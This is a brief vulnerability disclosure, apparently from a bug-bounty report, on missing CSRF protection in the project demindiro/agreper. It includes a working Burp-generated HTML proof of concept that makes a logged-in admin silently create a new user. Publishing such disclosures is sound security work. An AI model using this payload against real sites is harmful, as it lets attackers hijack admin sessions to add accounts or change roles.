Anti-CSRF mechanism is not present in demindiro/agreper
Jan 24th 2023
The application is vulnerable to a CSRF attack.
Proof of Concept
- Login as admin.
- Open the following HTML file in the browser. This action is equivalent to clicking a link sent by an attacker.
<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8000/admin/user/new/" method="POST"> <input type="hidden" name="name" value="csrf" /> <input type="hidden" name="password" value="password" /> <input type="submit" value="Submit request" /> </form> </body> </html>
- Click the button.
- A new user is created.
This vulnerability is capable of allowing an attacker to force a victim to perform admin actions such as:
- Creating a new user
- Changing user's role